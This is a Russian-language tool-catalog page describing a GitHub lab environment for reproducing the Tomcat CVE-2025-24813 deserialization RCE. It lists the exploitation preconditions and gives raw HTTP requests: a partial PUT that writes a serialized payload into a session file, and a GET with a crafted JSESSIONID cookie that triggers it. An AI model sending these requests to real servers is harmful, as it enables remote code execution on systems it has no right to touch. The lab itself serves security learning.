Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813: среда RCE через десериализацию | Kitploit
Инструменты/GitHubGitHub/x1ongsec/cve-2025-24813
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813: среда RCE через десериализацию

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание

Данный репозиторий представляет собой среду для воспроизведения последней RCE-уязвимости CVE-2025-24813 в Tomcat.

Только для обучения и исследований!

Условия эксплуатации

  • В приложении включена функция записи DefaultServlet, которая по умолчанию отключена
  • Приложение поддерживает частичные (partial) PUT-запросы, позволяющие записывать вредоносные сериализованные данные в файл сессии; эта функция включена по умолчанию
  • Приложение использует файловую персистентность сессий Tomcat и стандартное расположение хранилища сессий, что требует дополнительной настройки
  • В приложении присутствует библиотека с уязвимостью десериализации, например commons-collections в classpath; это условие зависит от того, использует ли бизнес-логика библиотеку с цепочкой эксплуатации десериализации

В данной среде уже включены указанные выше условия, необходимые для воспроизведения

Запуск Tomcat

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Доступ: http://127.0.0.1:9001/

image

POC

Сгенерируйте вредоносный сериализованный файл и загрузите его с помощью следующего пакета. Обратите внимание: значение чанка в Range должно совпадать с Length и превышать текущую длину файла.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

Для срабатывания используйте следующий POC:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

Ссылка: https://forum.butian.net/article/674

Скачать инструмент